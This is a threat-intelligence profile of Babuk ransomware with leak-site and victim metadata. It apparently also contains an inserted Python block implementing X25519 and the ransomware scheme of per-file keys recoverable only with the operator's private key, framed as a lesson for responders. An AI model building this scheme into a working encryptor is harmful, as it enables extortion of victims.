Threat Actor Profile
Low
Cybercriminal
Description
Babuk Ransomware is a sophisticated ransomware compiled for several platforms. The Windows build and an ARM build for Linux are the most commonly observed, but an ESX build and an older 32-bit PE executable have been seen over time as well. It uses an elliptic-curve algorithm (the Montgomery ladder on a Montgomery-form curve) to build the encryption keys.
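The "Montgomery Algorithm" in the description is scalar multiplication on a Montgomery-form curve, the operation behind X25519 (Curve25519, RFC 7748). The block below is an added example, not Babuk's code: it implements the RFC 7748 Montgomery ladder from scratch (standard library only) and then shows the key scheme this kind of ransomware builds on it, namely an operator public key embedded in the binary, a fresh ephemeral key per file on the victim, and the ephemeral public key stored next to the ciphertext so that only the holder of the operator's private key can rebuild the file key. The SHA-256 key derivation, the SHA-256 counter keystream standing in for a real stream cipher, and the 32-byte footer layout are assumptions chosen for illustration, not details taken from this page.

```python
"""X25519 (RFC 7748 Montgomery ladder) plus the ransomware-style file-key
scheme built on it. Added example, stdlib only; not Babuk's own code."""
import hashlib
import os

P = 2**255 - 19        # field prime of Curve25519
A24 = 121665           # (A - 2) / 4 for the Montgomery curve v^2 = u^3 + 486662*u^2 + u
BASE_U = (9).to_bytes(32, "little")   # standard base point, u = 9


def _clamp(k: bytes) -> int:
    """Clamp a 32-byte private key as RFC 7748 section 5 requires."""
    k = bytearray(k)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")


def _cswap(swap: int, a: int, b: int):
    """Branch-free conditional swap in the RFC's form (not constant-time in Python)."""
    dummy = (a ^ b) & -swap
    return a ^ dummy, b ^ dummy


def x25519(k: bytes, u: bytes) -> bytes:
    """Scalar multiplication k*u on Curve25519 with the Montgomery ladder."""
    k_int = _clamp(k)
    u = bytearray(u)
    u[31] &= 127                       # mask the unused top bit of the u-coordinate
    x1 = int.from_bytes(u, "little") % P
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):       # bit 254 is the clamped top bit of the scalar
        kt = (k_int >> t) & 1
        swap ^= kt
        x2, x3 = _cswap(swap, x2, x3)
        z2, z3 = _cswap(swap, z2, z3)
        swap = kt
        a = (x2 + z2) % P              # one differential add-and-double step
        aa = a * a % P
        b = (x2 - z2) % P
        bb = b * b % P
        e = (aa - bb) % P
        c = (x3 + z3) % P
        d = (x3 - z3) % P
        da = d * a % P
        cb = c * b % P
        x3 = (da + cb) ** 2 % P
        z3 = x1 * (da - cb) ** 2 % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    x2, x3 = _cswap(swap, x2, x3)
    z2, z3 = _cswap(swap, z2, z3)
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def public_key(priv: bytes) -> bytes:
    """Public key = priv * base point."""
    return x25519(priv, BASE_U)


def _keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in stream cipher (SHA-256 in counter mode) so the block stays
    stdlib-only; a real sample uses a proper stream cipher at this point."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + (i // 32).to_bytes(8, "little")).digest()
        out += bytes(x ^ y for x, y in zip(data[i:i + 32], block))
    return bytes(out)


def encrypt_file(plaintext: bytes, operator_pub: bytes) -> bytes:
    """Victim side: fresh ephemeral key per file, ECDH against the operator public
    key embedded in the binary, ephemeral public key stored as a 32-byte footer.
    The SHA-256 KDF and the footer layout are assumptions for illustration."""
    eph_priv = os.urandom(32)
    file_key = hashlib.sha256(x25519(eph_priv, operator_pub)).digest()
    blob = _keystream_xor(file_key, plaintext) + public_key(eph_priv)
    del eph_priv, file_key             # nothing left on the victim can rebuild file_key
    return blob


def decrypt_file(blob: bytes, operator_priv: bytes) -> bytes:
    """Operator side: only the static private key yields the same shared secret."""
    ct, eph_pub = blob[:-32], blob[-32:]
    file_key = hashlib.sha256(x25519(operator_priv, eph_pub)).digest()
    return _keystream_xor(file_key, ct)


if __name__ == "__main__":
    op_priv = os.urandom(32)           # generated offline by the operator, never shipped
    sample = b"constructed sample file contents"   # constructed input
    blob = encrypt_file(sample, public_key(op_priv))
    assert decrypt_file(blob, op_priv) == sample
    print("round trip ok; ephemeral public key footer =", blob[-32:].hex())
```

The point for responders is in the last two functions: everything needed to decrypt a file except the operator's static private key is sitting in the file footer, so recovery of data depends on obtaining that private key, not on weaknesses in the curve arithmetic. The ladder itself can be checked against the RFC 7748 test vectors (section 5.2 and the section 6.1 Diffie-Hellman exchange).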
Confidence Score
Tags
ransomware
ransomware.live
First Seen
Unknown
Last Updated
Unknown
Active Status
Active
Created
April 29, 2026
Indicators of Compromise
STIX Data
{'added_date': None,
'client': '2003264@sit.singaporetech.edu.sg',
'description': 'Babuk Ransomware is a sophisticated ransomware compiled for '
'several platforms. Windows and ARM for Linux are the most '
'used compiled versions, but ESX and a 32bit old PE executable '
'were observed over time as well. It uses an Elliptic Curve '
'Algorithm (Montgomery Algorithm) to build the encryption '
'keys.\n',
'firstseen': '2020-10-25T00:00:00+00:00',
'group': 'babuk',
'has_negotiations': True,
'has_ransomnote': False,
'lastseen': '2021-07-27T17:24:57+00:00',
'locations': [{'available': False,
'fqdn': 'nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion',
'slug': 'http://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion/',
'title': 'Babuk - Leaks site',
'type': 'DLS'}],
'negotiation_count': 2,
'ransomnotes_count': 0,
'tiaras_metadata': {'has_negotiations': True,
'has_ransomnote': False,
'locations': [{'available': False,
'fqdn': 'nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion',
'slug': 'http://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion/',
'title': 'Babuk - Leaks site',
'type': 'DLS'}],
'negotiation_count': 2,
'ransomnotes_count': 0,
'ransomware_live_group': 'babuk',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': [],
'Exfiltration': ['File[.]io'],
'LOLBAS': [],
'Networking': [],
'Offsec': [],
'RMM-Tools': []},
'url': 'https://www.ransomware.live/group/babuk',
'victims': 8,
'vulnerabilities': []},
'tiaras_source': 'ransomware.live',
'tools': {'CredentialTheft': [],
'DefenseEvasion': [],
'DiscoveryEnum': [],
'Exfiltration': ['File[.]io'],
'LOLBAS': [],
'Networking': [],
'Offsec': [],
'RMM-Tools': []},
'ttps': [],
'url': 'https://www.ransomware.live/group/babuk',
'victims': 8,
'vulnerabilities': []}